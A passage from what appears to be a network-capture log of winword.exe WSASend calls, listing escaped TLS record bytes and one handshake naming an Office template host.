\\xd8\\xe7\r\\xba\\xa0\\xb9s\\x9c\\xd8\\xdb\"\\xf6\\x07s\\x9c\\xd3\\xdfn_\\xb2\\xbc\\x16\\xd3\\x91b~v9=\\x1a-\\xf0\\xbb\\x001\\xc2tr\\x93\\xf9\\xce8\\x19\\xd4%\\xe3\\x92\\xa76h\\x90\\xea\\x07\\xe7m(\\xe0\\xf977\\x00\\x8ar\\xbf\\xff\\x8c\\xd9$\\xd5\\xbe\\x1dj9jd\\x88\\xa5g\\x95\\xe9o\\xda)\\xc3\\x8d\\xa3+\\xbf\\x9d\\xc0y\\x9a\\x80\\xb7\\xd2d*\\x85\\xa54\\xc5u\\xad\\x0c\\xdbr\\xfd&\\x08\\xbd3i\\x17w\\xaf\\xc1\\xa5p\\xafl\\x92\\x1b\\xd90\\xd3\\x02\\xaa\\xf51%8\\xe9\\xab\\xda\\x0c=\n\\xf62\\x17\\x8d\\\\xfe\\xaa\\xba\\xc6\\xab|\\xa2h\\xc9&*\\xfek"
419.  
420.  
421. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x1fg\\xa0\\x8d\\x12\\xa2\\x9cd\\x8f\\xd4\\xfe\\xe1o\\x9eb\\xdc\\xd4\\x89\\x12d\\xad\\xbc\\x08`\"nr\\x11\\x99j\\xda7\\xcb\\xb7a\\xc72\\xd8\\xc5l\\xeaec\\x0b\\xf7\\x98zy\\xb7\\xdb\\x97q\\xf9\\x19\\xb1l\\xfdn\\x8c7!l\\xbf\\xa24\\x7fy\n\\x00%pu\\xc4-\\xbe`\\xf8\\x7f\\xb0\\xcf\\x17bf\\x89_\\xe4\\x02\\x9dz\\x16\\xb6\\x15_\\xe1\\xd4\\xb9\\xf1\\xf9y\\x0fuf\\x06\\xc8\\xfc\\x02\\xdf\\xbak_\\x00\\x16\\xc0'\\x9a\\x1ax\\xe0\\x0b\\x17\\xd2\\xc3kh\\xd3\\xf7\\xdd~\\x10(\\x94q\\xfbq;\\xea\\x92\\xce\\x9ay\\xe0\\xb8\\xc4\\x08jn;\\x1f\\x11j\\xdc\\xecb1\\xb6\\x08\\x84\\xb8\\x9f\\xe1\\xb6\\x8f\\xf7\\xd4\\xd4\\xb8\n\\x8d\\xc8\\xc1\\xcf-e\\xd9\\xa0\\xdd\\x0fy\\x8f\\xa6\\xd6\\x08\r7\\xe5\\xf6\\xa6d2\\xae\\xfb;\\xcb@\\xa8\\x89p\\xc6\\x9c\\x02x\\xaa\\x7fp\\x9a\\x05\\xb1\\xab\\xbe^h\\x01\\x17\\xaa\\x81d\\x06\\xe0\\xf5\\xebbk\\x86\\x89\\xb1e\\xd4x\\xa1\\xcb\\xac\\xa3\\xdb\\xc4\\xa86\\xeb\\xe9\\x02\\xdd\\x99\\x82\\xb5\\xeb\\x96\\xc2\\xcb"
422.  
423.  
424. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xa9\\x82\\xf0\\x13\\xd0ng\\x0e\\xc6\\xcb\\xff\\x03n\\x86\\x04\\xa8p\\xdb\\xaa\\x8b @\\xcc\\xd96\\x96\\xea\\xca\\xbb'\\xb0\\x19\\xd5i\\x17\\x99\\xf3\\xa9\\x8d\\xc1\\xbfvu\\x8c\\x10\\xa1\\xd2/36\\x92\\xe6\\xf5\\x90\\xaepm\\xc9\\x94\\\\xf0\\x16\\xca\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x97)\\x1ag\\x9amb\\xdc\\xf4\\xd9x\rs\\xdc\\x00\\xbbp\\xb2\\x89\\xfe\\xd6\\x84\\xc1\\xba\\xbbcr\\xea(\\xb1\\xea\\xa5\\xc8\\x9d|*u\\xa2\\x97g\\xc2r\\x0e\\xe82\\x1a\\xdd\\xa0"
425.  
426.  
427. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xc2\\xdf\\xf5\\xb8\\x98~x\\xd4,\\xe2\\xe5h\\x8e\\xa9\\xcbmh\\x16in\\x8ac\\xdc?\\x15\\x16\\x0b?\\x0c\\x15\\x0c\\xf0i3s\\x0e\\xc9\\xa1c9pr\\xbc\\x11\\x19\\x8c\\x1c\\xff\\x14\\x18\\x9f\r\\xf7;\\x85\\xc8\\xc0\\x9e\\xfb\\xc1\\x8bcp\\xd4\\x8d\\xd3\\xaf\\x1555t\\xa8\\x80\\xdf\\x9awgh6\\xb9\\x8e\\x86\\x81m\\x05\\xc2-\\xcdb\\x9aca\\xcd\\xb0\\x04\\xea\\xa8ft\\x85<\t\\xc7\\xdc\\x86\\xda\\x8d\\xdf\\x80\\xe6\\x8b\\x8a\"\\x8a\t0i\\xbd\n\\x8f\\xb4@\\xa5!e\\x98\\xc7\\xeeh\\x08\\xd1\\x95`$\\x15h9n\\xd1w\\x07\\xf1|q\\xf8\\xe8\\x139\\x1c\\xcbl\\xdf?\\x9f\\x07>\\xf7\\xc7i\\xeci\\xac\\x08\\x8f\\xddvd\\x9b\\xbb\\xc7\\xea\\xc4$\\x1b\\x05ilh\\x94\\xd8<\\x0b\\x8b\\xf6\\xd3\\x1b\\xa9\\xf5\\x82\\xac)\\x80\\x15\\x08\\xa0\\xef\\xb9\\xfaf\\x97\\xe0/\\xc0\\x9d\\x9f\\x93\\x04'\\x10@\\x86\\xa4\\x8c\\xe1\\xdd:|+\\x84\\x01\\x8b\\x0b0\\x0b\\x8f_\\x1d\\xd2:\\xe6_\n\\x8a\\x8d\\x90f)\\x93\\x82\\x16\\x80\\xd7\\x8b1\\x18\\x92"
428.  
429.  
430. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x9b\\x05h\\xfa\\xa1\\xe7\n@p\\xda\\x9adbs\\x10<\\xeer$\\xcb\\x0f\\xa5\\xc9c\\xb3\\xdc\\xe1\\xaf\\xee\\xe9\\x11\\x8b\\xa7\\xf0\\xd9|\\xf5\\xe3\\xf1\\x8ez\"\\xc1f\\x12\\xee\\x93f\\x17^\\x12y\\x8c\\xab\\xd0\\xe3;\\xdb\\xfe*\\xa3!#\\x8c.<'\\xe5\\x978\\xe3\\xdf3\\x8d\\x9dm\\x14\\x95\\xa8rg\\xb5\\xb4\\x07\\xe6\\x04\\xd9\\xaf\\xfb\\xcdf\\xb3\\xaf\\x1bf\\x8a\\xabs\\xcdq\\x8e\\xf6s\\xb1j\\xbd\\x02g\\xf0c\\xd8\\xb2\\xc6\\xfcn\\xf13\\xc71\\xfd\\x18\"\\x81wf\\xe0&\\xa3\"\\x93k\\x89_\\x0c\\xb6\\x15\\xcc\\x08<\\x86\\xb2i\\xdf\\xb6*\\x9a\\xcb\\xc6t\\xb9k(\\xa3\\x0c\\xa8\\x86\\x0b\\x92s\\xe6\\xc9\\x18t\\xf4\\xa6h\\xc7\\xe1\\xe4|\\xce:\\x84\\xbf\\xd8\\x11j\\xa8\\xb6\\xcfd\\xc0y'o\\x9a\\x05e\\xdc\\x08j\\xd9\\xc9\\x86\\x12\\x9e,\\x13x$\\x07\\x10\\xd7\\x9e\\x90\\xb0b\\xfa:\\x08\\x06e\\x91)db\\xc4u\\xe0xx\\xbf\\x9f\\x0c\\x05\\xc5\\xa3*=\\x8c\\xca\\x10\\xc9\\xa0\\xef,|\\xa6\\x13\\xd4\\x1a-89s="
431.  
432.  
433. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xe7\\xb8e\\x8a\\xcd\\xcc/\\xf5\"\\xce\\x93\\x94r\\xb7\\xdbz\\x04x\\x88\\xbbu\\x0ce\\x91g\\xa8>\t\\x1a.\\xf7\\xe8)\\xec\\xd4.!\\xc3\\xf3\\xc2\\x83q0b\\xbb\\xeb6\\x94<\\xa3\\xd1t\\x88\\xc1g\\xa9\\x18@,\\xe0 3i\\x18\\x1e\\xaf\\x8a\\xd6\\x97\\x91~\\xcd\\xe8!\\x12u\\x05r\\x85k\\x97\\xff\\x98\\xf6e\\x9eb_\\xc4\\xa8\\x07\\xb7\\xafxrk\\x08h\\xdb\rty)+\\xb6\\xbfl=\\x82n\\xaf\\xfb)\\xdc\\x08\\x02x\\x1a\\xdc\\x1b\\x1b`\\xda\\xba\\xdf\\xafl\\xbb\\xb4\\x92\\xdf\\xc03d\\xdcqq\\xf2m0y\\xb5\\xa3\\x1d\\x8cd\\xb3\\x03\\xbc\\x1a\\xcdq\\x8ez\\x9da8\\x15\\xef\\x8c\\x17\\xeb\\xff\\xc2\\xce\\\\x9b\\x91\\xcaa\\xd5\\xaa\\xc5-z;\\x1b\\x9e\\xda\\x05$\\xd3\\xd3\\xa7'\\xe1\\x9e\\x0e\r\\xfb\\x0fg\\x0e\\xb5\nr\\xae\\x80\\xbf\\x84\\xa9\\x82\\xbd\\xa0\\xff\\xb3z\\xad3\\xf4\\x814^\\xb4\\x99\\xd3,k\\xf4\\x1a\\xe9q\\xa7/t\\xe8\\xa4\\xc6\\x8e\\x17o\\x8e\\xe9ax#\\xb3$\\x92xuf\\xfe\\x00u\\xd1\\xea\\x00\\x0c"
434.  
435.  
436. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010d\\x81\\xc04(k\\x87~\\xa2?\\xe4\\xacg\\xf1\\x08%\\x91i\\xaf-cn\\xe3=d\\x97r(\\xbaf\\x0f\\xef\\x04\\xf8\\xa1s\\xdb`\\x05\\x1d\\x8f\\xa5\\xeauu\\xa3h-\\xbc\\x12\\xf0\\xebn\\xbb\\x9e\r\\xfe.*\\xf0:9\\xb8y#\\xd1\\x05\\xb7\\xec\\x18\\xda\\xb4\\xc9i\\x8b\\x8cm\\xd18\\xfe\\xdb\\x99\\x94'\\xd7?\\x98\\x9b\\xd62f\\xdd\\x8f\\x8d&x \\xc0\\xaa\\xe0\\xb7\\xe5`\\x1f\\xa7\\x97\\xaa\\xf0\\xb7\\xc0\\xa2\\x98q^\r\\xa8m\\x86\\x1f\\xdc\\xf3.\\xd5\\x13\\xfej\\x9eum\\xee\\x94\\xedr\\x14\\xeb\\x0cxv\\xfd=>\\xdaa\\xe2)g\\x14\\xea\\xdbk/_0\\xb0\\x8f\\xebt`\\xcc0,\\xe1\\x0fe\\x0b\\xa0\\x0f\\x12\\x0e\\x07|\\\\x9a:\\xdfb\\xb9\\xa0\\xce!\\xcd\\xe8u\\xf9\\xcdw\\xe7#n\\x18^\\x84\\xadg\\xf9\\xc2\\x1c\\xabm(l\\x0c\\xb9\\xb2\\xbbc,\\xc8>\\x1bn\\x0f\\xc0o\\xf3\\x0ea\\xa3\\x9a`\\xebr!\\x80d\\xf1\\x1cq\\x17\\xda\\xee\\xa96\\xd6\\xe5\\xa6\\x02p`\\xc63(\\x90\\xdcs\\xec?"
437.  
438.  
439. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010.\\xc3s\\x9cc\\x8a\\xd3\\x8cou8t\\x076\\x1byv\\xa5\\xc4y$\\xae\\x12g\\x98e-d\\xe1;\\xf7`0\\x01tc\\xf5ztfq\\xcd\\x07m\\xc1\\xbd\\xa2\t'(\\xb2,\\x94\\x07\\xbf\\x93\\xd2\\xdd\\xea\\x96\\xf6v\\x04\\xe7i\\xf1\\xf6\\xe8\\x14@\\xf8\\xa2\\x96\\x941\\xb9n\\x0c*\\x0e\\xe8a\\xb6\n\\x99\\x94\\x91\\x17\\xe5gf\\xdd\\xe4f\\x98um\\xb3\\xd3nd\\xa2g\\xa7`\\x19\\x1b\\xbb\\x0c\\xe2\\xaa\\x00o\\x1f\\x85\\x08\\xa8w\\x9a\\xf4w\\x0ep\\x8c\\x8e:\\xed\\x9e\\xdfd\\xcb\\x92\\x10\\x8e\\x8e\\xe3\\x9a\\x1f\\x974\\xfc\\xb2\\x10a\\xe8\\xd94v\\x85\\x998\\x84\\xde\\x05\\xab\\xd0\\xab\\xda;\\x1c\\xba\\xce\\x90\\xd8l\\x03~\\xb9d\\xb3w\\xaa\\xed\\xb2\\x03\\xb9\\x11\\xdb&4y\\xabe\\xafk\\xbaj6\\xc4\\x96y\\xa3\\xb8cm\\xc4\\x9ct\\xd8\\x03!\\x04%\\x03w\\xbfz\\xb3c\\xac3\\x1cn\\xe0\\xb5\\xf3\\x02\\xa2\\x1a\\xd5\"\\xd3\\xb7\\x8el\\xcb?\\xde\\x13\\xc2\\xb2\\x0f\\x12\\xdc\\x06b\\xc8\\\\xb7\\x8e\\xf5\\xe0a$\\x00\\x94"
440.  
441.  
442. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04o\\x87\\x8d\\xa6\\x0f\\x9a\\xbb^\\xbe\\x11\\xec\\xe2g6d\\xf7rr\\xdcw\\xc0\\x96\\x08=\\x9ec\\x99\\xc9-\\xafca\\xba.\\x9c\\xf8\\xe8@b\\xfd\\xc6a\\x04\\xc4\\xb1\\xcd\\xd0\\xb9\\xd2\\x98\\x1f\\x96\\$\\xeb\\x9e\\xffo\\xae\\xf5\\xe7y\\x08\\xa5\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000|\\x88\\x8a\\xf5`\\xf7kw\\xf9\\xf8\\x1c\\x84)\\xb5,\\xf0\\xe8i\\xe2\\xe5o.\\xe2\\x99\\x16\\x8b\\xc9(\\xc9\\x0cu3\\x00\\xf4\\xddy|\\x12\\xc1\\xaeh\\xc2\\xd7/\\xd5t"
443.  
444.  
445. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xbd@\\xbe\\xaf\\x19\\x00\\x9c2 6\\xe1g\\x1d\\xa5\\xb3\\x19x\\xb8m\\xdc\\xda\\xf7\\x1a\\xdfn2\\x87\\xb9h\\x1fz\\xb7<u\\xb3\\xf5\\x17\nt\\xc8\\xd3\\xd6 \\xc2\\x1a\\x9bqx\\x93\\xd6!\\x16y\\xff^ t\\xaav\\x8e\\xda\\xa9\\x92\\xe6c\\xda\\x03\\x8f\\x00?&\\xd99\\x08\\x95k\\xfe\\x9e\\xbc\\xba\\xd3\\xde\\xb8\\xbazx\"ah\\x93\\xc2r_\\xfa\\xf1\\x10\\x0e\\xc5\\x99\\xbb \\x92\\xd1\\xc27-6lv\\x93\\xf1'\\x99u*\\xbe\\xc3'\\xd2\\x14\\x05\\xa0wwb/\\xb8\\xf9\\xca\\xf2\\xa7\\x18\\xf9\\xf7\\x85\\x1eb\\xff\\xd2\\x19u\\xa1\\xee\\xf4\\xa5\\xb3\\xe8yuc\\xc9ir^\\xf5(\\x1f\\x91\\x88\\xc5g\\x19\\x7ftz\\xe7\\xc2@\n\\xb1!\\xbc<+~\\xe7\\xde\\xba\\x12\\xdey0\\xa3\\xf6\\x85\\x13\\xfa\\x16\nz\\x00\\x92\\xae\\xf8;\\xea\\x11\\x8c\t\\xe0\\x7fga\\xfd\\x1c#y\\xc4\\xde\\x97\rq\\x1c\\x01\\x85e\\xc9\\x18ma\\xd8\\xfe\\x19#s\\x83!v>\\xc4\\xb0\\x90'\\x15\\xf5dtaf\\xd6\\xc1q\\xf6"
446.  
447.  
448. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xf4\\xd2\\xacb\\xee\\x86\\x82\\xe7\\xf5q\\x99\\xdex1o\\x1b(/k\\x1cyr\\xce\\xb8v\\x9b\r\\xe3\\xa3\\xce\\x04\\xaf\\xf0\\xc2\\xe5\\xa1\\xd5\\xabk\\xfc\\xfa\\xcf\\xab\\xb4\\x88x\\xe7\\xc5\\xad8'\\x04\\xa4\\x06\\xf5\\x9eo\\xe6zl!j\\xb8z:v\\xa7\\xb2x\\x8c\\xb4\\xa5i\\xee(\\x19.j\\xf7\\xad\\x0c\\x9e\r\\xfb\\x9cx\\x90\\xa5\\x85\\xe9\\xa5\\xe3\\xac\\x15'\\x1b'\\x06\\xfa\\xeb\\x08\\xfe\\xb2\\xfe$\\xbd*(lu\\xee;nj5?2\\xfa\\xd1a\\x08\\x8a\\x95m\\xe0b*\\x0f\\x04\\xad\\x84\\xe1\\xfe\\x89\\x14\\x00\\xcf\\x12\\xc1\\xa6;\\x91\\xb3hkv\\x18\\x08:\\xc737\\xban\\xad\\xc5v\\xd7v\\xe4\\xfdyt\\xdd\\x03\\xb9t\\xf4s\\x8a\\xbcv~vu.5\\xd0\\x96\\xf5\\xc3d\\x19\\xb54\\xf7\\xb1y@6d~\\x8a\\xdcl\\xde\\x85\\xbc\\xd2\\xb5\\xdd\\x7f\\xb2s\\x92)\\x1d\\x0f\\xf9\\xc09\\x00y\\x91\\x84\\x03osv\\xd40\\xee\\xcc%\\x11\\xbc\\x83>cw\\xfa\\xcb=\\xc81\\x92t\\xbak\\x99\\x108\\xa4l\\xbb"
449.  
450.  
451. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010*3\\xf7*\\xd9\\xff\\xf3\\xf3y\\xec_\\xc8\\xd4\\x89\\x91\\xed\\xf4\\xa4|\\x08dr\\x06d\\x94\\x7f\\x8e\\xcd\\xee\\xacd\\x82\\xd3\\x8eb\\x94\\x8d\\xf4\\x95\\xe2xg\\x85jy\\xec-\\x89\\x10\\xd4\\xfc\\xc48\\x04\\xe4*\\x8c\\xc7g\\x99\\x87#\\xc4\\xea\\xef\\xd2\\xadgm^'+\\xe4\\xd5\\x8e\\xf6sv\\xbb\\xbb\\xfc@\\xffp\\xef\\xba|v\\xb2\\xfa\\xd6\\xc9\\x02\\xbd\\xd6/\\x93,$\\xbft^+n\\xc5\\x03\\x03\\xfd\\x87\\x08\\xbef!\\xe4\\xabp\\x8d\\x80\\x01\\x85\\xd7\\x1c=u\\xd3>&3\\x12v\\xdbx\\xe4\\xfb\\xb5\to\\xba\\xd7(\\c\\x8f/\\xd2\\x06 k\\xbb\\xb0u\\xa9\\x9b\\x9c\\xcbd\\x95\\x7f:\\xcb\\xc0\\x9b\\x8ec\\xcf\\xea\\xc6\\x92\n\\xbcw\\xc55\\xd1p\\xc1\\x91\\x10\\x95@#\\x9a\\x92\\x1ba\\x87\\xf0\\xcaq\\x04i\\xe3\\x80\\xf5\\xe3v#\\xcf\\xbc\\x80\\x05.\\x17%\\xc3\\xd2\\xb7\\xf6\\xa7\\xf0\\x8b2\\xdc\\xa69\\xfd|<\\xd7\\xb9\\xc2\\x92\\xc5\\xde\\xac\\x13\\xe6\\xc7\\xa7\\xa7\\x83\\xde*\\x17>\\x7f\\x93'\\xb0\\xf6y|>\\x93\\xca\\xff\\xa2"
452.  
453.  
454. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x03e\\xfd8\\x1f\\xc32\\xde\\x1c\\x05\\xd4a5\\x8b_\\xa1\\x9a\\xa5\\xa0\\x08\\x01\\xa4\\xd4\\x1d\\x81\\x0e\\x89\\x9c\\xd0'\\xdc\\xfd\\x87\\x9f\\xba\\x15\\x04k\\x0b\\xac\\xf3\\xd5\\xce\\xdc\\xeb\\xbd6\\xc1s\\\\xcb,\\xe9ba\\xcd\\x93\\\\x8fj\\x0e\\x03\\x93\\x00\\x16\\x93\\xa1\\xd4\\x06\\x10\\xd5\\xd6\\xc2\\xfc)\\x8b`\\xe2pa9\\xad\\xa4\\x1b?<\\xe3c4\\xa5z\\x96\\x8c\\xed\\xff\\xba\\xfc\\xe3\\xa4,\\xc9\\xa2\\x81\\x17*\\x80q9\\xd9\\xe0@\\xea_\\x9d\\xfc*\\x05\\xf6`m\\xcay\\xf2\\xd1\\xcam\\xe9\\x86\\xb1!$\\x05\\xca\\xc0\\x8e\\x96/\\xd1\\x14\\x97\\xb2x\\xbd\\x12\\xde\\xc6\\xc1qm#4\\xf6\\xddh\\xf6\\xb7\\x13\\x8aj\\xca\\xff4\\x1fz\\xef\\xe1\\xf0\\x1e$\r\\xf1\\xb0v\\x92\\x08ff\\xe2\\x83\\x8d\\xc0\\x1c\\xa8s\\xcd\\x9d\\x91l\\x96\\x9f)d\\x92~m\\x17\\xe8\\xcfsl\\xae\r\\xc2\\x86r\\x03\\x7fx\\x9b\\xe7\\x00\\xc9#\\xd8\\x0e\\xea22(\\x14n\\xea\\x93d\\xcf\\x07v\\x86\\xeff\\xaf\\xe0\\xe8\\xac)~\\xf4;\\x9d.w\\xf4;t\\xb4\\x88/\\xfa\\xeab"
455.  
456.  
457. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010h\\x92i0p\\x10\\x8e\\x93\\x01@\\xf7\\x04\\x97\\xc6;\\x91\\xd9*l\\xce`b\\xd6d^#\\xf4\\xd0\\x11+\\x84=(\\xcf\\xa0\\xc5@\\xe0\\x13\\xed\\xb4\\x96\\xc9&\\xc3s\\x8a\\xb7rg\\xadk\\x07\\x81\\xaax/\\xc1\\xbb\\xa5\\x10\\xb2ja\\x87p0\\x89j\\x07\\xa7\\x1f\\xd0=\\x8f\\xba\\xb5\\xf7\\xd0\\x121\\x16\\xbe\\x96\\x8e\\x91)h\\xd4\\xa9\\x07?\\xf1\\xfe.k\\xda\\x04\\x80\\x8d\rf\\x97\\xa5()\\x90\\x94\\xe6\\x99\\x0b\\xd1\\x07\\x96\\xa1m\\xaa2\\xf7\\xbf\\x94|$\\xc2\\xcf\\x89,\\xea+\\xb0@\\x03\\xcf\\xa5\\x00\\x9a\\xaf1\\x9c6\\xb5\\xc0\\xb7\\xe0_\\x0f\\x8b\\x84\\x88f#\\xe5\\xa8\\x96\\x0b\\xc5n\\xfdr@\\xadi,\\xdc\\xa2a\\xb9\\xeeqyj\\xc1\\xfb\\xa2\\x7f\\xc7\\xb4\\xf6\\xf06\\xa7\\x19\\x8f\\x9e\\x83@\\xa9=4\\x8d*\\xf1g\\x1f\\x0b\\xc9+\\xd6\\x7fb\\x05\\xee\\xb3#\\xadv\\x17\\xb7\\xd5|\\xdb\\x0fulb\\xdd\\xe8r\\x05\\xfa\\x91\\xf0\\xa0\\x10\\xce+\\x84\\xdc\\xf2\\x07q\t\\x891\\xc8x\\x95d\\xcb\\x86c&\\x1f\\x92\\x9b\\xbe3\\xd1h"
458.  
459.  
460. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5a\\xde\\xd9f\\x81\\xff\\x80y\\xbb\\xf5q,^4\\xe3>\\x8c\\xeeq\\x84\\xf0$:p^\\xcfy\\xbf\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
461.  
462.  
463. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x9ei\\xe7\\x8e t\\xa5\\xbe.p!:\\x90\\xf9\\xc5\\x89\\xdf\\x07\\xc7\\x8ap\\x13\\xc9\\xeby309\\xc7\\x18\\x17\\xf8\\xec*\\x19r\\x9a\\x0c\\xd8\\xfd0\\x89\\xbc7\\x04d\\x11\\xd5f\\x11\\xe3\\x80\\x0f\\x81xc\\xcb\\xdb\\x06\\x84\\xfex\\x93ji\\xc1\\xb8\\xff\\x91\\x92'\\xd0\\xd4\\xf58@d<\\xe9\\x8c\\xbc|\\xa4/^\\xe0^\\xf0@\\x1d\n\\x1f\\x18gi\\x97\\xa9\\xfd<*\\x19\\xf3\\x9a\\x19xq\\xa4\\x94m8\\x88b';\\xeex\\xa7|\\xe6\\xbf\\x117\t\\xd3\\x9a\\xba@\\x14t7`\\xcb\\xa6\\xd6\\xb4\\xd0rf\\x7fsk$\\x90\\xf4\\x17\\xcd\\xd4k\\x9f\\x05\\x11\\xd0\\x85\\xdcg\\x15\\x83\\xb4\\xd4\\x7f\\xb6`\rjh/\\xa5b\\xd7\\x94\\xea\\x0fr\\xd0.yk8\\xb8\\xbfz+\\xb2\\xb2\\xa5\\xf8\\xd4\\xef\\x8c\\x80t\\xdc\\xfc\\xe9\\x8b\\xc8h\\xfe\\xcb\\x95y\\x9b\\x80\\x90t\\xcd\\xbfdy\\x17\\xcer\\x1f\\xd7@\\xbc\\x00^\\xfc\\xbc\\x8e\\x89\\x11\\x9b\\xbbk\\xcf\\x8c\\xfe\\xa8\\xf9\\x08\\xed\\xe5\"\\xb9\\xdb\\x7f\\xe8\\x02vw\\x89\\xe8\\xc6\\x10"
464.  
465.  
466. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xb5\\xb1h\\xe4\\x13\\xe7\\xbc:k\\xa0\\x9au|\\xb4m\\xab\\x95\\xe3\\xac5e\\x12\\xbb\\xb9_o\\xe0\\x18-t\\xfc\n5\\xb2\\xcd\\x95\\xea~\n\\x88\\x9f\\xa6>\\x0c\\xf3\\xef\\xd77\\xfd\\x18\\xd11\\x8c\\xa1zn\\x82\\x88\\x95\\xa5\\x9c\\x83\\x80\\x0f\\x9e\\xc8x\\xe2\\xea\\xbfx\\x7f\\xa6\\xb5\\x8e\\xc0\n\\xa8pu|\\xa7\\x04(f\\x1b\\x03\\xdd\\x82i,\\xb4\\xcf\\xbfr\\xd1`\\x14\\x84\\xa6\\xbes\\x92?\\xb0%\\x94\\x16\\x00\\xf7\\xb3\\xbd\\xd8\\xc6\\xd9\\x11\\xe2\\xcfe\\xf6\\xf8f\\x88h\\x97\\x928f\\xf1\\xde\\xd6.\\x94\\x8d\\xa7+\\x89\\x90\\xa0\\xc1\\x00\\x81\\xf6\\x94\\xab'\\xd9\\x076\\xc4\\x98s\\xb5\\x01\\xb6\\x85\\x93\\xca\\xa1yj\\x8bnz\\x86\\x8c\\xc7\\xe6\\x95p\\xf9mdbi\\xa37\\xb8f\\x80\\xc7\\xd1\\xc9\\xb1\\xbf\\xc3q>\\x02(\\xab\\xcb\\xfe?\r\\x84y\\xa7\\xb2\\xd2\n\\x8c<g\\xc7\\xf8\\xac\\xb8\\x18\\xb1\\xd5\\x8d\\xf0\\xc6\\xd4\\xf9\\xf8d\\xe4\\xbde2\\xcbo\\xdd\\x12\\x0f\\x8fqd\\x1cr\\xac\\x8e\\xda\\xe8x\\xb5:\\xf1\\x8a\\xe0\\\\xa4d\\xad (\\xd3"
467.  
468.  
469. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010$'\\x02\\xbby\\x82\\xa5vs\\xe7a\\xd1\\x87\\x9d\\xa2\\x8d\\xd7\\xab\\xb1m\\x9c\\x8c\\xa4ih|y\\xd9\\xda\\x01\\x98w9\\x14\\xd0\\x01\\x7f\\x85\\xc3my%\\xb1b\\xd4\\xd1\\xc2\\xcd$a!\\x83k7\\xd0\\xbd\\x15\\x85%=7\\xa7\\xe0z\\x02\\xa1am>\\xff\\x00\\x7f\\xce\\xaa%\\xae\\xd4\\x82\\xc1\\x07\\x11c\\xd9u\\xb8\\xfb,vt\\xe9|\\xf5<\r-\\xbez\\xbe\\x12\\xf0)q0u\\x90\r\\xf85i\\xd6\\xafa\\x17\\x11\\x99\\x9d:\\xf8\\xb2i\\xb4\\xe6v\\xc2\\x0f\\xfc\\xeej\\xa7\\xdf3z\\xea\\x1f\\xd7\\xc2\\xacs\\xf1s\\x9c\\xfcyp\\xbc\\xa4\\xda\\xdb\\xe7\\xb1c|\\x82b\\xe2\\xc08\\xd0\\x92\\xa5u.\\xc1\\x05h\\xd1\\x8c2\\xc7\\x81-\\xeb1\\x84k\\x80\\xad\\xb5\\xea\\x1dp>#\\xa2\\xb6dc'^\\xfe\\xc4'c'oh\\xe5pv\\xc3\\x07\\x9aq\\x12l\\xd6\\x08q\\x93\\x94?1>\\xc1\\x17\\xda8\\xbb\\xca\\x04\\xd9pj\\xc1*\\xe7\\xca\\x93\\x1f\\x84\\xc9\\x9c\\x17dl\\x04\\x18+\\x8f\rx\\xf3=k\"\\xc6\\x9f"
470.  
471.  
472. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010k\\xcc/\\xed\\xe7\\x97\\x8fpv7\\x1b\\xbf\\x16\\xa4\\xb1\\x12\\x0f\\xaf\\x84\\xad!\\x1c\\xd7\\x02-\\xcf\\x96\\xa9\\xfcf\\xeex\\xe2z\\xa0b\\x12\\xbd\\x0e\\xf5\\xab\\xe0n\\x89\\xc3\\x8fu\\x99m\\x80*\\xdf@-l\\xa6skq\\xaf\npr?\\x97^\\xa4x\\x1c_\\xed\\x0f\\xd9qw\\xce\\x90<&)\\xb4\\xd5\\xad\\xc5\\x8c\\x15\\xc3f_f|sc0\\x19\\xf5\\xdc\\x13\\x97\r\\x88\\xe1\\xc4x\\xe7\\xcd\\xe1\\xc0z\\xfac0o \\xa44\\x81\\/\\xa6>'v\\x1a\\xbex\\xd0\\x0c\\xfd_\\x8b\\xa0|\\xe9\\xcb<w\t\\x9c\\xeb$\\x9e\\x19g\\xc2\\x1c\\xe4\\xca\\x12\\xa1\\x13\\x00\\xfee\\x92f\\xcb=\\x16\\x8foue\\xcfwb\\xd9\\xcd\\xb1/\\xd1\\xd4\\x0b)\\xaep\\x98\\xbc\\xf0\\xc2$\\xf9\"\\xcf\\xa9\\xcb\\xd2\\xd5\\xd3k\\x1e\\xec<\\\\xb4\\xb6\\x98\\xcc\\xccq\\x84\\xab\\xf2\\x9bq/\\xd7x\\xb5\\\\x10\\xa9xo\\xa7\\x84\\x04\\xe1\\x04\\xc1\\xc4\\xd7\\xd5\\xb8\\xed\\x8c\\xb3f\\xb3v\\x0e\\xeap\\x1c%\\x12x-!j\\x1c\\xaf\\xf12\\x12s\\x89\\xd7\\x0c(\\xb0"
473.  
474.  
